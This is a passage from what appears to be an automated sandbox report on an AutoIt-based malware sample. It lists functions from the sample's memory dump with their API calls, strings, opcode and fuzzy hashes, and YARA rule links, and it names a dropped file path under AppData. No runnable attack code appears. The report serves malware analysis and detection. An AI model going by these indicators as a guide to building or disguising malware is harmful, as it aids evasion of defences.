              • API ID: HandleLoadModuleString__swprintf$Message_memmove_wcslen_wprintf
              • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
              • API String ID: 3631882475-2268648507
              • Opcode ID: 6eb5e825f0fa485df0718d222732b8b27df6560e933de3ade055536574b04a45
              • Instruction ID: 00cb2da6740565c3528549c7df4ca13345e6202d692289ba11ea57cb38622810
              • Opcode Fuzzy Hash: 6eb5e825f0fa485df0718d222732b8b27df6560e933de3ade055536574b04a45
              • Instruction Fuzzy Hash: 2F416F7290020AABEF10FBA0DC86EEE777CAF48751F504425F604B7156DA786E45DBB0
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00FEE724, Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 163COMMON
              Download Yara Rule
              APIs
              • LoadStringW.USER32(?,00000066,?,00000FFF), ref: 00FEE76C
                • Part of subcall function 00F91D10: _wcslen.LIBCMT ref: 00F91D11
                • Part of subcall function 00F91D10: _memmove.LIBCMT ref: 00F91D57
              • LoadStringW.USER32(?,?,?,00000FFF), ref: 00FEE78D
              • __swprintf.LIBCMT ref: 00FEE7E4
              • _wprintf.LIBCMT ref: 00FEE8A0
              • _wprintf.LIBCMT ref: 00FEE8C4
              Strings
              Memory Dump Source
              • Source File: 00000004.00000002.394808921.0000000000F91000.00000020.00020000.sdmp, Offset: 00F90000, based on PE: true
              • Associated: 00000004.00000002.394801893.0000000000F90000.00000002.00020000.sdmp Download File
              • Associated: 00000004.00000002.394898675.0000000001012000.00000002.00020000.sdmp Download File
              • Associated: 00000004.00000002.394918477.0000000001020000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.394935971.0000000001021000.00000008.00020000.sdmp Download File
              • Associated: 00000004.00000002.394948655.0000000001022000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.394965694.0000000001037000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.394977155.000000000103B000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: LoadString_wprintf$__swprintf_memmove_wcslen
              • String ID: Error: $%s (%d) : ==> %s:$%s (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
              • API String ID: 2295938435-2354261254
              • Opcode ID: 4d0b6b67f6acb766ec1936fd273d9d1e0632b04cd580594cae15a2f72d58e10c
              • Instruction ID: 643f2210c53a54611a8f49c196e17a65c02dc31f7ae4a5efa26e14c1f3b7dcb3
              • Opcode Fuzzy Hash: 4d0b6b67f6acb766ec1936fd273d9d1e0632b04cd580594cae15a2f72d58e10c
              • Instruction Fuzzy Hash: C9517071E1021AABEB24EF90DC82EEF7378BF45350F104529F94467246DB78AE45DBA0
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00FE3126, Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 160COMMON
              Download Yara Rule
              APIs
              Strings
              Memory Dump Source
              • Source File: 00000004.00000002.394808921.0000000000F91000.00000020.00020000.sdmp, Offset: 00F90000, based on PE: true
              • Associated: 00000004.00000002.394801893.0000000000F90000.00000002.00020000.sdmp Download File
              • Associated: 00000004.00000002.394898675.0000000001012000.00000002.00020000.sdmp Download File
              • Associated: 00000004.00000002.394918477.0000000001020000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.394935971.0000000001021000.00000008.00020000.sdmp Download File
              • Associated: 00000004.00000002.394948655.0000000001022000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.394965694.0000000001037000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.394977155.000000000103B000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: __swprintf_wcscpy$__i64tow__itow
              • String ID: %.15g$0x%p$False$True
              • API String ID: 3038501623-2263619337
              • Opcode ID: eb6b1cb011b3bdfe6a32a63d2bfa2b90129b6d943f3100014e3ddb5fe5baa77f
              • Instruction ID: 99f0d0403e9de6e22bc694efc6bc9a5ede92ceb778877b980fc0bfd9570f630b
              • Opcode Fuzzy Hash: eb6b1cb011b3bdfe6a32a63d2bfa2b90129b6d943f3100014e3ddb5fe5baa77f
              • Instruction Fuzzy Hash: 15412CB2D001145BE710EF75DC8AF667368EF46310F0485BAFE49CB245E639DA14E7A2
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00FEE525, Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 154COMMON
              Download Yara Rule
              APIs
              • LoadStringW.USER32(?,00000066,?,00000FFF), ref: 00FEE56D
                • Part of subcall function 00F91D10: _wcslen.LIBCMT ref: 00F91D11
                • Part of subcall function 00F91D10: _memmove.LIBCMT ref: 00F91D57
              • LoadStringW.USER32(?,00000072,?,00000FFF), ref: 00FEE58C
              • __swprintf.LIBCMT ref: 00FEE5E3
              • _wprintf.LIBCMT ref: 00FEE690
              • _wprintf.LIBCMT ref: 00FEE6B4
              Strings
              Memory Dump Source
              • Source File: 00000004.00000002.394808921.0000000000F91000.00000020.00020000.sdmp, Offset: 00F90000, based on PE: true
              • Associated: 00000004.00000002.394801893.0000000000F90000.00000002.00020000.sdmp Download File
              • Associated: 00000004.00000002.394898675.0000000001012000.00000002.00020000.sdmp Download File
              • Associated: 00000004.00000002.394918477.0000000001020000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.394935971.0000000001021000.00000008.00020000.sdmp Download File
              • Associated: 00000004.00000002.394948655.0000000001022000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.394965694.0000000001037000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.394977155.000000000103B000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: LoadString_wprintf$__swprintf_memmove_wcslen
              • String ID: Error: $%s (%d) : ==> %s:$%s (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
              • API String ID: 2295938435-8599901
              • Opcode ID: a48dff221d38c3c8cb7392fbf9de80ceff1e2e2adb4d25bd9e84c30af89736a6
              • Instruction ID: 9f3bd06c4d36c66bfc3819a4edf0e51d460b1f632bfa7cf52b3af0be59a72979
              • Opcode Fuzzy Hash: a48dff221d38c3c8cb7392fbf9de80ceff1e2e2adb4d25bd9e84c30af89736a6
              • Instruction Fuzzy Hash: D0518771D1020AABDB24EFA4DC82EEF7778EF44350F208429F91567245EB786E05DBA0
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00FE268F, Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 147COMMON
              Download Yara Rule
              APIs
              Strings
              Memory Dump Source
              • Source File: 00000004.00000002.394808921.0000000000F91000.00000020.00020000.sdmp, Offset: 00F90000, based on PE: true
              • Associated: 00000004.00000002.394801893.0000000000F90000.00000002.00020000.sdmp Download File
              • Associated: 00000004.00000002.394898675.0000000001012000.00000002.00020000.sdmp Download File
              • Associated: 00000004.00000002.394918477.0000000001020000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.394935971.0000000001021000.00000008.00020000.sdmp Download File
              • Associated: 00000004.00000002.394948655.0000000001022000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.394965694.0000000001037000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.394977155.000000000103B000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: __fread_nolock$_fseek_wcscpy
              • String ID: FILE
              • API String ID: 3888824918-3121273764
              • Opcode ID: 12dafe4d4055a080cf99ddede1699618bce2f0142678512cf6fb1e8696a4d969
              • Instruction ID: 05efbda63b98f91b4750231baef6750f5dcd9a911235b921b8d564602a628acd
              • Opcode Fuzzy Hash: 12dafe4d4055a080cf99ddede1699618bce2f0142678512cf6fb1e8696a4d969
              • Instruction Fuzzy Hash: A041B9F2900204BBDB20EFA5DC81FEB73BDAF99710F148559B90497181F6B5A744DBA0
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00FE3F89, Relevance: 19.3, APIs: 6, Strings: 5, Instructions: 93windowCOMMON
              Download Yara Rule
              APIs
              • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,?,?,?,?,00FB818B,?,?,?,#include depth exceeded. Make sure there are no recursive includes,?), ref: 00FE3FAE
              • LoadStringW.USER32(00000000), ref: 00FE3FB5
                • Part of subcall function 00F91D10: _wcslen.LIBCMT ref: 00F91D11
                • Part of subcall function 00F91D10: _memmove.LIBCMT ref: 00F91D57
              • _wprintf.LIBCMT ref: 00FE3FE9
              • __swprintf.LIBCMT ref: 00FE4018
              • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00FE4084
              Strings
              Memory Dump Source
              • Source File: 00000004.00000002.394808921.0000000000F91000.00000020.00020000.sdmp, Offset: 00F90000, based on PE: true
              • Associated: 00000004.00000002.394801893.0000000000F90000.00000002.00020000.sdmp Download File
              • Associated: 00000004.00000002.394898675.0000000001012000.00000002.00020000.sdmp Download File
              • Associated: 00000004.00000002.394918477.0000000001020000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.394935971.0000000001021000.00000008.00020000.sdmp Download File
              • Associated: 00000004.00000002.394948655.0000000001022000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.394965694.0000000001037000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.394977155.000000000103B000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: HandleLoadMessageModuleString__swprintf_memmove_wcslen_wprintf
              • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
              • API String ID: 455036304-4153970271
              • Opcode ID: 93e748abefa51ecbbfc1cc4bbebea4f4c18126c9d0a8953061c9aad5db32fa17
              • Instruction ID: b03c2197af9e0017a5f0abfad22cf1fd3a5438e0726f80ce251584854b557b07
              • Opcode Fuzzy Hash: 93e748abefa51ecbbfc1cc4bbebea4f4c18126c9d0a8953061c9aad5db32fa17
              • Instruction Fuzzy Hash: 3F31C272B00209ABDF15EF94DC469AF7378EB88751F10405AFA04AB202D639AE05DBF1
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00FF6DDB, Relevance: 18.3, APIs: 12, Instructions: 310COMMON
              Download Yara Rule
              APIs
              • SafeArrayAccessData.OLEAUT32(0000007F,?), ref: 00FF6EB0
              • SafeArrayAccessData.OLEAUT32(0000007F,0000007F), ref: 00FF6F29
              • SafeArrayGetVartype.OLEAUT32(0000007F,?), ref: 00FF6FBE
              • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00FF6FEA
              • _memmove.LIBCMT ref: 00FF7005
              • SafeArrayUnaccessData.OLEAUT32(00000000), ref: 00FF700E
              • SafeArrayAccessData.OLEAUT32(0000007F,?), ref: 00FF702B
              • _memmove.LIBCMT ref: 00FF70B9
              • SafeArrayAccessData.OLEAUT32(0000007F,?), ref: 00FF710E
              • SafeArrayUnaccessData.OLEAUT32(00000004), ref: 00FF70F8
                • Part of subcall function 00FA14F7: std::exception::exception.LIBCMT ref: 00FA1546
                • Part of subcall function 00FA14F7: std::exception::exception.LIBCMT ref: 00FA1560
                • Part of subcall function 00FA14F7: __CxxThrowException@8.LIBCMT ref: 00FA1571
              • SafeArrayUnaccessData.OLEAUT32(01009A0A), ref: 00FF6F95
                • Part of subcall function 00FA14F7: _malloc.LIBCMT ref: 00FA1511
              • SafeArrayUnaccessData.OLEAUT32(01009A0A), ref: 00FF717D
              Memory Dump Source
              • Source File: 00000004.00000002.394808921.0000000000F91000.00000020.00020000.sdmp, Offset: 00F90000, based on PE: true
              • Associated: 00000004.00000002.394801893.0000000000F90000.00000002.00020000.sdmp Download File
              • Associated: 00000004.00000002.394898675.0000000001012000.00000002.00020000.sdmp Download File
              • Associated: 00000004.00000002.394918477.0000000001020000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.394935971.0000000001021000.00000008.00020000.sdmp Download File
              • Associated: 00000004.00000002.394948655.0000000001022000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.394965694.0000000001037000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.394977155.000000000103B000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: ArraySafe$Data$Access$Unaccess$_memmovestd::exception::exception$Exception@8ThrowVartype_malloc
              • String ID:
              • API String ID: 2170234536-0
              • Opcode ID: fb1e914a27e06f64ef766feb9aabd930fbfc00a856ce75a5cd44acdd69263a81
              • Instruction ID: 8629344b78cfa57f7277b65100a432c552ac3ef1e89aacb4a2cffedb08e979c3
              • Opcode Fuzzy Hash: fb1e914a27e06f64ef766feb9aabd930fbfc00a856ce75a5cd44acdd69263a81
              • Instruction Fuzzy Hash: 8BB106766002099FD714DF58D884BBAB7B5FF49310F24806DEA44CB361DB3AE845EBA1
              Uniqueness

              Uniqueness Score: -1.00%

              Function 0100931C, Relevance: 16.6, APIs: 11, Instructions: 147memoryCOMMON
              Download Yara Rule
              APIs
              • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,00000000,010095B7), ref: 0100933A
              • SafeArrayAllocData.OLEAUT32(010095B7), ref: 01009389
              • VariantInit.OLEAUT32(?), ref: 0100939B
              • SafeArrayAccessData.OLEAUT32(010095B7,?), ref: 010093BC
              • VariantCopy.OLEAUT32(?,?), ref: 0100941B
              • SafeArrayUnaccessData.OLEAUT32(010095B7), ref: 0100942E
              • VariantClear.OLEAUT32(?), ref: 01009443
              • SafeArrayDestroyData.OLEAUT32(010095B7), ref: 01009468
              • SafeArrayDestroyDescriptor.OLEAUT32(010095B7), ref: 01009472
              • VariantClear.OLEAUT32(?), ref: 01009484
              • SafeArrayDestroyDescriptor.OLEAUT32(010095B7), ref: 010094A1
              Memory Dump Source
              • Source File: 00000004.00000002.394808921.0000000000F91000.00000020.00020000.sdmp, Offset: 00F90000, based on PE: true
              • Associated: 00000004.00000002.394801893.0000000000F90000.00000002.00020000.sdmp Download File
              • Associated: 00000004.00000002.394898675.0000000001012000.00000002.00020000.sdmp Download File
              • Associated: 00000004.00000002.394918477.0000000001020000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.394935971.0000000001021000.00000008.00020000.sdmp Download File
              • Associated: 00000004.00000002.394948655.0000000001022000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.394965694.0000000001037000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.394977155.000000000103B000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
              • String ID:
              • API String ID: 2706829360-0
              • Opcode ID: b58a1c5b4f1514d1a4a4350343bf204a982d9aa8b3f0ee6f8ceda906549275b3
              • Instruction ID: d1053b3ff336a1d26b1ecee1f0e6cd9b2a1f8d10fbeef94c71eb6efdd3609952
              • Opcode Fuzzy Hash: b58a1c5b4f1514d1a4a4350343bf204a982d9aa8b3f0ee6f8ceda906549275b3
              • Instruction Fuzzy Hash: 31518171A00219EBDB10DFE4D884DDEBBB8FF48304F21455DFA45A7141DB39AA45DBA0
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00FE4262, Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 271libraryloaderCOMMON
              Download Yara Rule
              APIs
              Strings
              Memory Dump Source
              • Source File: 00000004.00000002.394808921.0000000000F91000.00000020.00020000.sdmp, Offset: 00F90000, based on PE: true
              • Associated: 00000004.00000002.394801893.0000000000F90000.00000002.00020000.sdmp Download File
              • Associated: 00000004.00000002.394898675.0000000001012000.00000002.00020000.sdmp Download File
              • Associated: 00000004.00000002.394918477.0000000001020000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.394935971.0000000001021000.00000008.00020000.sdmp Download File
              • Associated: 00000004.00000002.394948655.0000000001022000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.394965694.0000000001037000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.394977155.000000000103B000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: AddressProc_free_malloc$_strlen
              • String ID: AU3_FreeVar
              • API String ID: 3358881862-771828931
              • Opcode ID: c473793cf49dbe66e491132ba03da9ac4b6568ef8e0542003eb2282b27ff612d
              • Instruction ID: 6bea2a522cddf6ce3e348a6a15695e3818ed7f6e9570efc6292259592fbf9f05
              • Opcode Fuzzy Hash: c473793cf49dbe66e491132ba03da9ac4b6568ef8e0542003eb2282b27ff612d
              • Instruction Fuzzy Hash: 01B1C0B4A00246DFCB00DF59C885A6AB7B5FF88314F2881ADE9158B362D735FD51EB90
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00FEFB23, Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 147windowCOMMON
              Download Yara Rule
              APIs
              • _memset.LIBCMT ref: 00FEFB72
              • GetMenuItemInfoW.USER32(?,FFFFFFFF,00000000,00000030), ref: 00FEFBBF
              • IsMenu.USER32 ref: 00FEFBD6
              • CreatePopupMenu.USER32(00000000,?,769133D0), ref: 00FEFC0E
              • GetMenuItemCount.USER32 ref: 00FEFC74
              • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00FEFC9D
              Strings
              Memory Dump Source
              • Source File: 00000004.00000002.394808921.0000000000F91000.00000020.00020000.sdmp, Offset: 00F90000, based on PE: true
              • Associated: 00000004.00000002.394801893.0000000000F90000.00000002.00020000.sdmp Download File
              • Associated: 00000004.00000002.394898675.0000000001012000.00000002.00020000.sdmp Download File
              • Associated: 00000004.00000002.394918477.0000000001020000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.394935971.0000000001021000.00000008.00020000.sdmp Download File
              • Associated: 00000004.00000002.394948655.0000000001022000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.394965694.0000000001037000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.394977155.000000000103B000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: Menu$Item$CountCreateInfoInsertPopup_memset
              • String ID: 0$2
              • API String ID: 3311875123-3793063076
              • Opcode ID: 854f8e70151e2750a3138e283dd8e102c256fa159483517a09f0cfccdcd53175
              • Instruction ID: c1af7d3b59cb29a2937bb30ad3fc3f827cbcaba3beb6f43586faf5454f8cdd72
              • Opcode Fuzzy Hash: 854f8e70151e2750a3138e283dd8e102c256fa159483517a09f0cfccdcd53175
              • Instruction Fuzzy Hash: 9051A471A0024D9BDB20CF6ED884BAE77A4EF84324F34852DE865D72C1D3749A49DBA1
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00F91E00, Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 118windowCOMMON
              Download Yara Rule
              APIs
              • LoadStringW.USER32(?,00000065,?,0000007F), ref: 00FB7AB3
                • Part of subcall function 00F92390: _wcslen.LIBCMT ref: 00F9239D
                • Part of subcall function 00F92390: _memmove.LIBCMT ref: 00F923C3
              • _memset.LIBCMT ref: 00F91E90
              • _wcsncpy.LIBCMT ref: 00F91ED2
              • _wcscpy.LIBCMT ref: 00F91EF1
              • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00F91F03
              • __swprintf.LIBCMT ref: 00FB7B2D
              Strings
              Memory Dump Source
              • Source File: 00000004.00000002.394808921.0000000000F91000.00000020.00020000.sdmp, Offset: 00F90000, based on PE: true
              • Associated: 00000004.00000002.394801893.0000000000F90000.00000002.00020000.sdmp Download File
              • Associated: 00000004.00000002.394898675.0000000001012000.00000002.00020000.sdmp Download File
              • Associated: 00000004.00000002.394918477.0000000001020000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.394935971.0000000001021000.00000008.00020000.sdmp Download File
              • Associated: 00000004.00000002.394948655.0000000001022000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.394965694.0000000001037000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.394977155.000000000103B000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: IconLoadNotifyShell_String__swprintf_memmove_memset_wcscpy_wcslen_wcsncpy
              • String ID: Line %d: $AutoIt -
              • API String ID: 1629950421-4094128768
              • Opcode ID: 293e198cc6a884d6cac37afe8e44be9c122d02c58b4d5dce371e51383acb289b
              • Instruction ID: 78c5669754492213dad7f2bc26e68a9d82304aa8b46d79d9216e7d3e758f48c3
              • Opcode Fuzzy Hash: 293e198cc6a884d6cac37afe8e44be9c122d02c58b4d5dce371e51383acb289b
              • Instruction Fuzzy Hash: C9419271518345ABE760FB20DC42FDF73A8BF85314F04092DF58993185EB79AA08DB92
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00FC401B, Relevance: 14.0, APIs: 6, Strings: 2, Instructions: 49windowCOMMON
              Download Yara Rule
              APIs
              • GetModuleHandleW.KERNEL32(00000000,010390E8,?,00000100,?,C:\Users\user\AppData\Roaming\98025414\ewdsxu.ije), ref: 00FC403E
              • LoadStringW.USER32(00000000), ref: 00FC4047
              • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 00FC405C
              • LoadStringW.USER32(00000000), ref: 00FC405F
              • _wprintf.LIBCMT ref: 00FC4088
              • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00FC40A0
              Strings
              • C:\Users\user\AppData\Roaming\98025414\ewdsxu.ije, xrefs: 00FC4027
              • %s (%d) : ==> %s: %s %s, xrefs: 00FC4083
              Memory Dump Source
              • Source File: 00000004.00000002.394808921.0000000000F91000.00000020.00020000.sdmp, Offset: 00F90000, based on PE: true
              • Associated: 00000004.00000002.394801893.0000000000F90000.00000002.00020000.sdmp Download File
              • Associated: 00000004.00000002.394898675.0000000001012000.00000002.00020000.sdmp Download File
              • Associated: 00000004.00000002.394918477.0000000001020000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.394935971.0000000001021000.00000008.00020000.sdmp Download File
              • Associated: 00000004.00000002.394948655.0000000001022000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.394965694.0000000001037000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.394977155.000000000103B000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: HandleLoadModuleString$Message_wprintf
              • String ID: %s (%d) : ==> %s: %s %s$C:\Users\user\AppData\Roaming\98025414\ewdsxu.ije
              • API String ID: 3648134473-2931731946
              • Opcode ID: 06a176ae627f5841c2666ac9b54df4e868da0bcef3ce7783c53e0657f93cfbe1
              • Instruction ID: e7c89dd84ad54bdd204c220bc3ceda61088c7a1df8a7f80b782168075dc45f46
              • Opcode Fuzzy Hash: 06a176ae627f5841c2666ac9b54df4e868da0bcef3ce7783c53e0657f93cfbe1
              • Instruction Fuzzy Hash: 37016CB5A543187AEB20E6959D07FF6376CD7C4711F004199B748AB084DAF86D848BB1
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00FEE9FC, Relevance: 12.6, APIs: 6, Strings: 1, Instructions: 325timeCOMMON
              Download Yara Rule
              APIs
              • VariantInit.OLEAUT32(00000000), ref: 00FEEA43
              • VariantCopy.OLEAUT32(00000000), ref: 00FEEA4D
              • VariantClear.OLEAUT32 ref: 00FEEA5A
              • VariantTimeToSystemTime.OLEAUT32 ref: 00FEEBF3
              • __swprintf.LIBCMT ref: 00FEEC20
              • VariantInit.OLEAUT32(00000000), ref: 00FEECDB
              Strings
              • %4d%02d%02d%02d%02d%02d, xrefs: 00FEEC1A
              Memory Dump Source
              • Source File: 00000004.00000002.394808921.0000000000F91000.00000020.00020000.sdmp, Offset: 00F90000, based on PE: true
              • Associated: 00000004.00000002.394801893.0000000000F90000.00000002.00020000.sdmp Download File
              • Associated: 00000004.00000002.394898675.0000000001012000.00000002.00020000.sdmp Download File
              • Associated: 00000004.00000002.394918477.0000000001020000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.394935971.0000000001021000.00000008.00020000.sdmp Download File
              • Associated: 00000004.00000002.394948655.0000000001022000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.394965694.0000000001037000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.394977155.000000000103B000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: Variant$InitTime$ClearCopySystem__swprintf
              • String ID: %4d%02d%02d%02d%02d%02d
              • API String ID: 2441338619-1568723262
              • Opcode ID: 39c04db52c02a4a31d9c44b71921ad1a40f464b85174f2719ba66213ebd49bbd
              • Instruction ID: cb02e480fb1ca0cb8405ec3f0531fedfad7752f44064e7eff2269e840823fafe
              • Opcode Fuzzy Hash: 39c04db52c02a4a31d9c44b71921ad1a40f464b85174f2719ba66213ebd49bbd
              • Instruction Fuzzy Hash: 54A1F473A0052487CB209F4AF4C066AF7A0FB45721F1585AEED899B314C636AC95E7E0
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00F99400, Relevance: 12.6, APIs: 6, Strings: 1, Instructions: 324sleepCOMMON
              Download Yara Rule
              APIs
              • InterlockedIncrement.KERNEL32(01037F04), ref: 00FBC5DF
              • InterlockedDecrement.KERNEL32(01037F04), ref: 00FBC5FD
              • Sleep.KERNEL32(0000000A), ref: 00FBC605
              • InterlockedIncrement.KERNEL32(01037F04), ref: 00FBC610
              • InterlockedDecrement.KERNEL32(01037F04), ref: 00FBC6C2
              Strings
              Memory Dump Source
              • Source File: 00000004.00000002.394808921.0000000000F91000.00000020.00020000.sdmp, Offset: 00F90000, based on PE: true
              • Associated: 00000004.00000002.394801893.0000000000F90000.00000002.00020000.sdmp Download File
              • Associated: 00000004.00000002.394898675.0000000001012000.00000002.00020000.sdmp Download File
              • Associated: 00000004.00000002.394918477.0000000001020000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.394935971.0000000001021000.00000008.00020000.sdmp Download File
              • Associated: 00000004.00000002.394948655.0000000001022000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.394965694.0000000001037000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.394977155.000000000103B000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: Interlocked$DecrementIncrement$Sleep
              • String ID: @COM_EVENTOBJ
              • API String ID: 327565842-2228938565
              • Opcode ID: 5115cc87150488a51cc94b7c5ffd4290b08914d45ba361a893185d26232a2cd8
              • Instruction ID: 45b805a2c09b2de143176511a55a9de768424a9ff20cc93f75372e94af3fd511
              • Opcode Fuzzy Hash: 5115cc87150488a51cc94b7c5ffd4290b08914d45ba361a893185d26232a2cd8
              • Instruction Fuzzy Hash: FDD1AA71D002099BEF10EF95C885BEEB3B4BF44310F208169E445AB242CB79AD46EBD0
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00FFB9C2, Relevance: 12.6, APIs: 5, Strings: 2, Instructions: 308COMMON
              Download Yara Rule
              APIs
              • _memset.LIBCMT ref: 00FFBA14
              • VariantInit.OLEAUT32(?), ref: 00FFBAE4
                • Part of subcall function 00FE1AB8: GetLastError.KERNEL32(?,?,00000000), ref: 00FE1B16
                • Part of subcall function 00FE1AB8: VariantCopy.OLEAUT32(?,?), ref: 00FE1B6E
                • Part of subcall function 00FE1AB8: VariantCopy.OLEAUT32(-00000068,?), ref: 00FE1B84
                • Part of subcall function 00FE1AB8: VariantCopy.OLEAUT32(-00000088,?), ref: 00FE1B9D
                • Part of subcall function 00FE1AB8: VariantClear.OLEAUT32(-00000058), ref: 00FE1C17
              Strings
              Memory Dump Source
              • Source File: 00000004.00000002.394808921.0000000000F91000.00000020.00020000.sdmp, Offset: 00F90000, based on PE: true
              • Associated: 00000004.00000002.394801893.0000000000F90000.00000002.00020000.sdmp Download File
              • Associated: 00000004.00000002.394898675.0000000001012000.00000002.00020000.sdmp Download File
              • Associated: 00000004.00000002.394918477.0000000001020000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.394935971.0000000001021000.00000008.00020000.sdmp Download File
              • Associated: 00000004.00000002.394948655.0000000001022000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.394965694.0000000001037000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.394977155.000000000103B000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: Variant$Copy$ClearErrorInitLast_memset
              • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
              • API String ID: 530611519-625585964
              • Opcode ID: 105b7becab8f0b083cc7064b4ecf01dc3e8ad22f0b1c84abe70fc21a4372c5b8
              • Instruction ID: 32ca20ce6c166c9d1908acd6787d2a9b4aeba254c160b586055ae1fc701f0abf
              • Opcode Fuzzy Hash: 105b7becab8f0b083cc7064b4ecf01dc3e8ad22f0b1c84abe70fc21a4372c5b8
              • Instruction Fuzzy Hash: 1DA18172A4020DABDB10DF99DCC1EFEB3B9FF88714F508529F604AB250D77999419BA0
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00F91F20, Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 240COMMON
              Download Yara Rule
              APIs
              • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00F91F76
              • DestroyWindow.USER32(?), ref: 00FB6EC0
              • UnregisterHotKey.USER32(?), ref: 00FB6EE7
              • FreeLibrary.KERNEL32(?), ref: 00FB6F8F
              • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00FB6FC0
              Strings
              Memory Dump Source
              • Source File: 00000004.00000002.394808921.0000000000F91000.00000020.00020000.sdmp, Offset: 00F90000, based on PE: true
              • Associated: 00000004.00000002.394801893.0000000000F90000.00000002.00020000.sdmp Download File
              • Associated: 00000004.00000002.394898675.0000000001012000.00000002.00020000.sdmp Download File
              • Associated: 00000004.00000002.394918477.0000000001020000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.394935971.0000000001021000.00000008.00020000.sdmp Download File
              • Associated: 00000004.00000002.394948655.0000000001022000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.394965694.0000000001037000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.394977155.000000000103B000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: Free$DestroyLibrarySendStringUnregisterVirtualWindow
              • String ID: close all
              • API String ID: 4174999648-3243417748
